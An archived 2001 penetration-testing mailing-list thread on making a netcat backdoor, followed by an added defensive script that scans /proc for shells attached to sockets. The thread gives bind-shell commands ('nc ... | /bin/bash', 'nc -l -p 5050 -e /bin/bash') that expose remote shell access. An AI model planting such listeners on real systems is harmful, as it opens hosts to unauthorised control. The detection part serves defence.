Penetration Testing mailing list archives
Re: [PEN-TEST] nc backdooring
From: Cold Fire <coldfire () SHADY ORG>
Date: Thu, 25 Jan 2001 21:27:53 +0000
On Wed, Jan 24, 2001 at 10:52:19PM -0200, starlink wrote:
> Hi, folks!
>
> On one machine (the server, with root permission) I typed:
>
>     nc -l -p 5050 | /bin/bash
>
> On another machine (the client) I typed:
>
>     nc server_ip 5050
>
> With this I could execute any program on the server. Both machines are Red Hat Linux.
>
> The question is: how can I get the output of the remote execution back?
> Is there a nicer way of doing this with netcat?
Compile netcat with -DGAPING_SECURITY_HOLE, then:

    nc -v -l -p 5050 -e '/bin/bash'

on the server and

    nc -v <ip> 5050

on your box.

Steve

--
'Cold Fire, Britain's most notorious hacker' Observer, July 1997

'The most recent conviction was that of [Cold Fire] whose On-line escapades spanned from hacking into educational sites to more sinister activities such as tapping into industrial and United States military sites.' DC Paul Cox, SO6 Scotland Yard CCU
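From the defender's side, both variants in this thread (`nc ... | /bin/bash` and `nc -e /bin/bash`) leave the same footprint on the server: a shell process whose stdin and/or stdout is a socket rather than a tty or pipe. The script below is an added example, not code from the thread; it walks a /proc tree and reports such shells. It assumes a Linux /proc that provides `/proc/PID/comm`, and takes an alternative root directory as its argument so it can be exercised on a constructed tree.

```sh
#!/bin/sh
# Added detection helper (not from the thread): report processes whose command
# name is a shell and whose fd 0 or fd 1 resolves to "socket:[inode]".
# A "nc -l -p 5050 | /bin/bash" backdoor shows up as bash with fd0=socket:[...];
# "nc -e /bin/bash" shows up with both fd0 and fd1 pointing at the socket.
# Assumes a Linux /proc that exposes /proc/PID/comm and /proc/PID/fd/N links.

# Usage: find_socket_shells [PROC_ROOT]   (PROC_ROOT defaults to /proc)
# Prints one line per hit: "<pid> <comm> fd<N>=<link target>"
find_socket_shells() {
    proc_root="${1:-/proc}"
    for pid_dir in "$proc_root"/[0-9]*; do
        [ -d "$pid_dir" ] || continue
        # Command name as the kernel reports it (e.g. "bash", "nc").
        comm=$(cat "$pid_dir/comm" 2>/dev/null) || continue
        case "$comm" in
            sh|bash|dash|ksh|zsh) ;;   # only interested in shells
            *) continue ;;
        esac
        for fd in 0 1; do
            # readlink fails for processes we may not inspect; skip those.
            target=$(readlink "$pid_dir/fd/$fd" 2>/dev/null) || continue
            case "$target" in
                socket:*) echo "${pid_dir##*/} $comm fd$fd=$target" ;;
            esac
        done
    done
}

# Run against the live system when executed directly.
if [ "${0##*/}" != "sh" ] && [ "${0##*/}" != "bash" ]; then
    find_socket_shells "${1:-/proc}"
fi
```

A shell whose fd 0 is a socket is not always malicious (sshd sessions use a pty, but some service managers spawn shells over sockets), so treat hits as leads to inspect with `ls -l /proc/PID/fd` and `netstat -anp`, not as verdicts.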